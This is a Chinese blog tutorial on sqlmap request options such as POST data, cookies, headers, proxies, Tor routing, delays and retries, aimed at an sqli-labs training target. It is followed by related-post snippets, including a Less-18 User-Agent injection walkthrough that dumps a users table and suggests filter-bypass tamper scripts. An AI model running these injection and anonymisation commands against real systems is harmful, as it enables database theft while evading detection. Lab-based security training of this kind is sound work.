注入工具 -- sqlmap(设置请求参数)

最新推荐文章于 2025-04-19 15:26:22 发布
最新推荐文章于 2025-04-19 15:26:22 发布
阅读量2.6k 收藏 3
点赞数
分类专栏: web安全工具库 文章标签: 注入工具 sqlmap 设置请求参数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_41489908/article/details/103676773
版权
我希望我是那种你一见面就觉得心动的人,而不是在权衡利弊后觉得还不错的人。。。

一、抓包

在这里插入图片描述

二、设置提交参数

sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111&passwd=222222222&submit=Submit” --baner

在这里插入图片描述

三、多个参数,指定分隔符

sqlmap -u “http://192.168.1.121/sqli/Less-11/index.php” --data=“uname=111111111111;passwd=222222222;submit=Submit” --param-del=";" --baner

四、带cookie注入

sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --cookie “uin=fasdffes; skey=fwefdsd; ptisp=cfasdfas” --banner

五、设置user-agent

–random-agent 随机UA
–user-agent=“Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36”

在这里插入图片描述

sqlmap自带的UA

六、设置host

加*或者–level 5

七、设置referer

加*或者–level 5

八、额外的http头

–headers,每个标头用换行符分割,或者直接在sqlmap.conf文件中设置
sqlmap -u “http://192.168.1.121/sqli/less-1/?id=1” --headers=“Host:ww.baidu.com\nUser-agent:Firefco” -v 5

九、设置HTTP协议认证的参数:–auth-type和–auth-cred

–auth-type:Basic/Digest/NTLM
–auth-cred认证语法:username:password
弹出对话框,让输入账号和密码

十、设置http代理

–proxy http(s):ip[:端口] --proxy “http://1.2.3.4:9000”
–proxy-cred username:password
–proxy-file 设置多条代理

在这里插入图片描述

–ignore-proxy 设置忽略系统代理

十一、设置tor隐藏网络

1、安装tor
apt install tor
2、开启服务
service tor start
3、查看状态
service tor status
sqlmap -u “http://192.168.1.121/sqli/less-1/?id=1” --tor --tor-type https --check-tor

十二、设置延迟

–delay 0.5 延迟0.5秒

十三、设置超时

–timeout 5 5秒超时

十四、设置随机化参数

sqlmap -u “http://192.168.1.121/sqli/less 1/?id=1” --randomize id --banner
id会变成任意值

十五、设置重试

–retries 5 重试5次

十六、日志过滤目标

在burpsuite中,保存日志,里面会有很多数据包,但是我们只探测一个
sqlmap -l log.txt --scope=“192.168.1.121”
–skip-urlencode 不进行url加密

十七、设置忽略401

–ignore-401 参数用来忽略未验证错误
禁止非法,后果自负
欢迎大家关注公众号:web安全工具库

在这里插入图片描述

SQL注入工具-----sqlmap
追求卓越,技术流~
10-25 3851
合天网安笔记 利用sqlmap进行文件的读写 简介:sqlmap是一款开源、功能强大的自动化SQL注入工具,支持Access,MySQL,Oracle,SQL Server,DB2等多种数据库。支持get,post ,cookie注入,支持基于布尔的盲注,基于时间的盲注,错误回显注入,联合查询注入,堆查询注入等。 第一步:首先设置好靶机 打开http:10.1.1.136,输入用户名:admin 密码:password 登入 找到SQL Injection随意输入一个数,打开burpsuite进行抓包,点
Less-1(sqlmap自动注入攻击)--sqli
XiaoYeZhu_1314的博客
01-28 847
表明有四种注入漏洞:boolean-based blind,error-based,time-based blind,UNION query。指定用于身份验证的cookie进行注入测试。打开火狐浏览器,进入sqli第一关的页面。尝试获取操作系统级别的shell访问权限。指定POST请求的数据进行注入测试。查看结果发现,可以访问到名字和密码。遇见[y/n]都直接回车跳过,得到。设置测试的深度级别(1-5)设置测试的风险级别(1-3)获取数据库管理系统的信息。获取数据库中表的信息。获取数据库表中的数据。
注入工具 -- sqlmap(自定义检测参数)
Web安全工具库
12-19 858
一、设置探测等级,Cookie在level为2的时候就会测试,User-Agent/Referer头在level为3的时候就会测试,默认是1 sqlmap -u “http://192.168.1.121/sqli/Less-1/?id=1” --level 5 --dbs 二、设置测试风险参数,默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试,默认是1...
sqlmap学习——请求参数
Oopsl的博客
02-22 616
sqlmap请求参数 显示输出级别 -V 取值范围0-6 0 错误信息 1 警告和普通信息 2 调试信息debug 3 使用攻击的载荷 4 请求头 5 响应头 6 响应体 这里默认数值为1 一般为3足矣 连接数据库(这里以连接mysql为例) -d "mysql"://用户名:密码@地址:端口号/数据库名" --banner 指定url地址 -u "url地址" --banner...
sql注入11之sqlmap使用
最新发布
jonhswei的博客
04-19 829
SQLMap 支持多种 SQL 注入技术,包括盲注(Blind)、错误注入(Error-based)、联合查询注入(Union-based)等。SQLMap 的最简单的用法是检测目标 URL 中是否存在 SQL 注入漏洞。如果目标数据库配置不当且 SQL 注入漏洞严重,SQLMap 还可以利用该漏洞获取操作系统命令执行权限。SQLMap 提供了。如果你通过 SQL 注入漏洞得到了用户表并且其中包含密码哈希,SQLMap 可以尝试进行暴力破解。你可以使用 SQLMap 来测试该表单的 SQL 注入漏洞。
SQLmap参数设置之二——1.sqlmap设置user-agent;2.sqlmap设置host头;3.sqlmap设置referer头;4.sqlmap设置其他的HTTP头
m_de_g的博客
12-15 2034
我们在渗透测试的过程中,很容易被服务器识别出来,他们正在被使用sqlmap扫描,造成我们被溯源或发现。然而,通过提供自定义用户代理选项的参数,可以使用选项。默认情况下,从提供的目标URL解析HTTP主机头。直接使用bp进行抓包,获取信息。通过上图我所测试的流量分析中可以看出来,确实在请求的过程中,使用的。注入,这感觉即熟悉又陌生,话不多说,直接开整😁😁😁。值,如果不是一个合法的值就会中断连接,同时。上也有相应的靶场,可供大家使用。查看sqlmap的详细参数的使用。抓取的流量可以看出来,请求头。
sqlmap的使用
xu_daren的博客
02-09 2710
sqlmap -r 请求数据包 –thread(1-10)调线程 –current --db 爆破当前数据库 -d“DBMS://USER:PASSWORD@DBMS_IP:DBMS_PORT/DATABASE_NAME”—— 直接链接数据库 -u ——指定url -l<.log文件>——从log文件个解析目标 -m <文本文件>——从文件中解析目标 -g <搜索内容>——以google搜索结果作为目标,注意搜索内容中引号要注意转义 请求、认证类参数 –method=&
sqlmap (三)HTTP参数设置
hpx12345678的博客
10-06 831
cookie::浏览网页后存储在计算机的缓存文件user-agent:用户代理host:主机头referer:引用头PS:关于–level value 的含义;想要检测cookie注入那么value 至少为2以上想要检测 user agent 注入那么value 至少为3以上想要检测 host头注入那么value设置为5想要检测referer注入value设置为3以上。
Sqlmap与burpsuite动态更新某些参数
weixin_30830327的博客
08-23 293
有如下注入点: http://localhost/id=1&order_nu=1 情况说明: id为注入点, 每一次注入时, order_nu不能跟上次的一样(假说这个order_nu为一个订单号, 提交一次时会进入数据库查询是否存在,存在时直接提示订单号存在并退出, 而且它不为注入点)。 如: http://localhost/id=INJECT&am...
网络安全-实验七-SQL注入-盲注+sqlmap使用.docx
11-10
1. sqlmap是一款强大的自动化SQL注入工具,它可以自动识别SQL注入漏洞并利用它们。在本实验中,我们将用sqlmap对DVWA(Damn Vulnerable Web Application)靶场进行测试。 2. 首先,我们需要获取靶机上的数据库信息...
【渗透工具】P 3-3 sqlmap请求参数设置
Z_David_Z的博客
02-17 1289
目录sqlmap设置HTTP方法sqlmap设置POST提交参数sqlmap设置参数分割符sqlmap设置Cookie头sqlmap设置User-Agentsqlmap设置Host头sqlmap设置Referer头sqlmap设置额外HTTP头sqlmap设置HTTP协议认证sqlmap设置HTTP代理sqlmap设置Tor隐藏网络sqlmap设置延迟sqlmap设置超时sqlmap设置重试次数sqlmap设置随机化参数sqlmap设置日志过滤目标sqlmap设置忽略401sqlmap设置HTTP协议私钥s
第三节 Sqlmap 请求参数设置-01
09-15
Sqlmap 请求参数设置详解 Sqlmap 是一款功能强大的渗透测试工具,能够自动检测和利用 SQL ...Sqlmap请求参数设置是检测 SQL 注入漏洞的关键。只有正确地设置请求参数Sqlmap 才能正确地检测和利用 SQL 注入漏洞。
【SQL注入Sqlmap使用指南(手把手保姆版)持续更新
记录并分享学习安全的知识点..
03-15 2657
sqlmap 是一款开源的渗透测试工具,可以自动化进行SQL注入的检测、利用,并能接管数据库服务器。它具有功能强大的检测引擎,为渗透测试人员提供了许多专业的功能并且可以进行组合,其中包括数据库指纹识别、数据读取和访问底层文件系统,甚至可以通过带外数据连接的方式执行系统命令。python sqlmap.py -参数sqlmap可以运行在python2.6、2.7和3.x的任何平台上。
Sqlmap的使用
niqiu320的博客
04-23 655
SQLMAP简介与配置 SQLMap是一款由Python2开发的自动化SQL注入工具,其主要功能是扫描、发现并利用SQL注入漏洞,它内置了很多绕过插件,并且支持多种数据库,如MySQL、Oracle、PostgreSQL、SQL Sever、Access、IBM DB2、SQLite等数据库。 SQLMAP的强大之处在于对数据库指纹的识别、数据库枚举、数据提取、访问目标文件系统、并在获取完全的操作权限时执行任意命令,它支持一下几种独特的注入: 基于布尔类型的注入,即可根据返回页面判断条件真假的注入。 基于
SQLMAP详细介绍之参数详解
yuchen的博客
01-16 1907
SQLMAP参数详解option 选项target 目标Request 请求Optimization 优化Injection 注入Detection 侦察Techniques 技巧Fingerprint 指纹Enumeration 枚举Brute force 暴力User-defined function injection 用户自定义注入函数File system access 访问文件系统Operating system access 操作系统连接windows 注册表连接通用参数和混杂选项 optio
sqlmap常用参数汇总
安全知识学习-该平台为唯一原作者平台,其他平台属冒名顶替,请勿相信上当受骗
07-16 2950
SQLMAP 观察数据 获取目标方式 直接连接到数据库 目标url 从文本中获取多个目标url 从文件中加载http请求 请求方式 http 数据 HTTP cookie头 HTTP User-Agent头 HTTP Host头 HTTP Referer头 设定超时时间 注入技术 设定注入方式 设定延迟注入时间 设定UNION查询字段数 设定UNION查询使用的字符 列数据 标志 用户 当前数据库 列数据库管理用户 列出数据库系统的数据库 列举数据库表 列
SQLMap 使用参数详解
热门推荐
qq_37019068的博客
10-09 2万+
SQLMap 使用参数详解 SQLMap是一款自动化的SQL注入测试工具,在kali上已集成 如果不想使用kali的话,可以从github上直接拉取开源项目 git clone https://github.com/sqlmapproject/sqlmap.git 注:最新版的sqlmap应该是支持python3的,但是如果python3无法使用的话可以试试切换成python2执行 常见参数 -h 输出参数说明 -hh 输出详细的参数
SQLMAP工具详解
zxq850107005的博客
10-13 2022
sqlmap 支持的注入模式: ​ 基于布尔的盲注:根据返回的页面内容为条件判断真假的注入; ​ 基于时间的盲注:不能根据页面返回内容判断任何信息。用条件语句加入延时函数,通过页面的返回时间来判断; ​ 基于报错注入:利用页面会返回错误信息; ​ 联合查询注入:可以使用union的情况下的注入; ​ 堆查询注入:可以同时执行多条语句的注入。 支持的数据库:多种… 选项 1、输出等级 ​ -v:观察sqlmap对一个点进行了怎样的常识判断以及读取数据,默认是1 ​ 0(只显示python错误以及严重的信息
网络安全-sqlmap注意项及高级使用
关注网络安全、云原生安全
07-12 2516
注意项 ip隐藏 跑一些python脚本获取免费ip代理,或者购买稳定的ip代理 --proxy=http://112.84.54.169:9999 UserAgent隐藏 参数-A="你的UserAgent" 或者--random-agent 高级使用
sqli-labs靶场sqlmap注入18关
04-03
<think>好的,我现在需要帮助用户解决SQLi-Labs靶场第18关使用sqlmap进行SQL注入的问题。首先,我得回顾一下用户提供的引用内容,特别是引用[5],里面提到了第18关的解决方法。用户可能已经看过这个引用,但可能还需要更详细的步骤指导。 首先,我需要确认第18关的具体情况。根据引用[5],第18关是一个POST请求注入点,涉及User-Agent头部的注入。用户需要使用sqlmap工具,并且需要先通过Burp Suite抓取数据包,保存为txt文件,然后在User-Agent字段中标记注入点。接着,使用sqlmap-r参数指定数据包文件,并利用--current-db等参数获取数据库信息。 接下来,我需要将这个过程分解成清晰的步骤,确保用户能够一步步跟随。可能需要包括安装Burp Suite、配置代理、抓取数据包、保存文件、运行sqlmap命令等步骤。同时,用户可能需要知道如何设置代理,比如在浏览器中配置Burp Suite的监听地址和端口,以及如何处理HTTPS流量,如果需要的话。 另外,用户可能对sqlmap命令的参数不太熟悉,比如--tamper或--level等,需要解释这些参数的作用。例如,--level 2会增加测试的等级,覆盖更多的注入点。而--tamper可能在某些情况下需要,但根据引用[5],第18关不需要tamper脚本,所以可能不需要用到这个参数。 还要注意用户可能遇到的常见问题,比如数据包保存的格式是否正确,User-Agent是否正确地标记了星号*,以及如何验证注入是否成功。例如,用户可能需要检查sqlmap的输出,确认是否成功获取到数据库名或其他信息。 另外,引用中提到第18关的闭合方式是单引号',这可能意味着注入点是在User-Agent字段中使用单引号闭合的。因此,在构造payload时,sqlmap会自动处理这种闭合方式,用户不需要手动指定,但了解这一点有助于调试问题。 最后,用户可能需要一些额外的提示,比如如何提升注入的成功率,或者如何处理可能的WAF(Web应用防火墙)拦截。例如,使用--delay参数来减缓请求速度,避免被检测到,或者使用代理来隐藏流量。 总结来说,回答需要结构清晰,分步骤指导用户从抓包到运行sqlmap命令,解释关键参数,并提供注意事项和常见问题解决方法,确保用户能够顺利通过第18关。</think>### SQLi-Labs 第18关sqlmap注入解决方案 根据引用[5]的描述,第18关属于HTTP头部User-Agent字段的POST请求注入,需通过以下步骤实现自动化注入: **步骤1:准备环境** 1. 安装Burp Suite并配置浏览器代理(默认监听127.0.0.1:8080) 2. 访问第18关页面`http://[靶机IP]/sqli-labs/Less-18/`,触发正常请求 **步骤2:抓取数据包** 1. 在Burp Suite的Proxy模块拦截HTTP请求 2. 在请求头中找到User-Agent字段,在值末尾添加`*`标记注入点 ```http User-Agent: Mozilla/5.0* # 添加*作为注入标识 ``` 3. 将完整请求包保存为`less18.txt` **步骤3:执行sqlmap命令** ```bash python sqlmap.py -r less18.txt --current-db --batch ``` - `-r`:指定包含HTTP请求的文件 - `--current-db`:获取当前数据库名 - `--batch`:自动选择默认选项 **步骤4:进阶利用** ```bash # 获取所有数据库 python sqlmap.py -r less18.txt --dbs --level=2 # 获取指定数据库表 python sqlmap.py -r less18.txt -D security --tables # 获取字段数据 python sqlmap.py -r less18.txt -D security -T users --dump ``` **关键参数说明**: - `--level=2`:增加检测强度(默认检测范围不包括HTTP头部) - `--risk=3`:启用高风险测试模式(需谨慎使用) - `--tamper`:本关不需要编码脚本,但复杂场景可配合`base64encode`等脚本[^3] **注意事项**: 1. 确保靶场环境配置正确,User-Agent字段存在注入漏洞 2. 若遇到过滤规则,可尝试`--tamper=space2comment`等绕过脚本 3. 数据包中的`*`必须紧接在User-Agent值之后,如:`User-Agent: payload*` 4. 推荐配合`--flush-session`参数避免缓存影响测试结果
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

web安全工具库

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值